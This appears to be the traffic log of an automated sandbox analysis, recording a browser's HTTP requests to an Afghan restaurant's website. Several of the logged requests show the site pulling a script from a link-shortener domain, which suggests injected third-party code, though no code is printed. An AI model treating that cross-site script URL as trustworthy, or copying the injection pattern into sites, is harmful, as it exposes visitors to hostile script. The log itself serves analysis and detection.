Source: global trafficHTTP traffic detected: GET /assets/imgs/food_menu_tea.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/img_recipe_5.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/img_recipe_8.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/food_menu_beverage.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /hoursAndLocation HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/food_menu_extra.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/img_recipe_7.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /eWD0j3 HTTP/1.1Host: cuturls.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.afghanhayatrestaurant.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/header_2.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/assets/css/custom.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/about-section.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/assets/css/foodhut.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/Banner_location_image.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/assets/css/custom.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /maps/embed?pb=!1m18!1m12!1m3!1d3144.533724303754!2d145.20973321518076!3d-37.988009579721194!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x6ad61409ac52d843%3A0xb215f2f86d8cc962!2sAfghan%20Rahimi%20Restaurant!5e0!3m2!1sen!2slk!4v1658071830116!5m2!1sen!2slk HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.afghanhayatrestaurant.com.au/hoursAndLocationAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/vendors/themify-icons/fonts/themify.woff?-fvbane HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.afghanhayatrestaurant.com.ausec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.afghanhayatrestaurant.com.au/assets/vendors/themify-icons/css/themify-icons.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /eWD0j3 HTTP/1.1Host: cuturls.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: sid=531b57b9-7fad-11ef-9455-174eec4a577f
Source: global trafficHTTP traffic detected: GET /assets/imgs/header_2.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/Banner_location_image.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/about-section.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /takeaway HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/takAway_1.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/takeawayAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /eWD0j3 HTTP/1.1Host: cuturls.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.afghanhayatrestaurant.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/takAway_2.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/takeawayAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/takAway_3.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/takeawayAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/header_6.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/assets/css/custom.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/Banner_take_image.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/assets/css/custom.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /eWD0j3 HTTP/1.1Host: cuturls.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: sid=531b57b9-7fad-11ef-9455-174eec4a577f
Source: global trafficHTTP traffic detected: GET /assets/imgs/takAway_1.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/takAway_3.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/takAway_2.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/header_6.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/Banner_take_image.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /gallery HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/gallery/gallary-4.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/galleryAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /eWD0j3 HTTP/1.1Host: cuturls.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.afghanhayatrestaurant.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/gallery/gallery_N6.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/galleryAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/gallery/gallary-m-7.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/galleryAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/gallery/gallary-1.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/galleryAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/gallery/gallary-m-12.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/galleryAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/gallery/gallary-m-9.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/galleryAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/gallery/gallary-4.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /eWD0j3 HTTP/1.1Host: cuturls.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: sid=531b57b9-7fad-11ef-9455-174eec4a577f
Source: global trafficHTTP traffic detected: GET /assets/imgs/gallery/gallary-8.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/galleryAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/gallery/gallery_N6.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/gallery/gallery_new2.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/galleryAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/gallery/gallary-m-7.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/gallery/gallary-1.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/gallery/gallary-m-12.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
